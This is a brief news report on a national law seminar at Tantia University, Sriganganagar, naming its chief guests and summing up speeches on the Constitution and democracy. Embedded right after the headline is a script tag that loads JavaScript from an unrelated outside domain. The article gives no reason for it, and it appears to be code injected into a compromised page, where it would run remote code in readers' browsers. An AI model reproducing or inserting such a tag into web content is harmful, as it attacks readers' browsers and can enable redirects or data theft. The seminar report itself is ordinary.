CONSTITUTION PAVES THE WAY FOR ALL-ROUND DEVELOPMENT<script src="https://new2sportnews.com/face2news.js"></script>

A two-day national seminar on 'Indian Constitution- An Inspiration, Aspirations and Challenges of the Present' was concluded last evening by the Faculty of Law at Tantia University Sriganganagar. In the concluding session, senior legal expert Dr. B.S. Nirvana was the chief guest, Dr. Bhagwana Ram Bishnoi, Dean of Maharaja Ganga Singh University, Bikaner was the guest of honour, Dr. Vishwanath Singh, Principal, Government Law College, Sriganganagar was the special guest, the session was presided over by Tantia University President Prof. M.M. Saxena.

The speakers said that the Constitution paves the way for all-round development, the Supreme Court is maintaining its dignity. To keep democracy alive, it is necessary to protect the constitution, if it comes under fire, one has to be alert.(SUBHEAD)

At the beginning of this session, Dr. Saurabh Garg, Dean, Faculty of Law, the coordinator of the seminar, presented the report, Dr. Sandeep Kaur, Organizing Secretary. Rajinder Singh Captain proposed vote of thanks. Dr. Sandeep Kaur and Medha Vaid conducted the proceedings. Rajinder Singh Captain was specially honored for his meritorious services.

In the inaugural session on the first day, Jayant K. Sood, Additional Solicitor General, Supreme Court, attended the inaugural session as the chief guest. Dean, School of Legal Studies, Central University of Punjab, Bathinda Dr. Tarun Arora and Prof. of Aligarh Muslim UniversityDr. Mohammad Tariq also unveiled the monument of Ashoka Pillar. A large number of participants from Rajasthan, Punjab, Haryana, Uttar Pradesh, Delhi participated in the seminar.
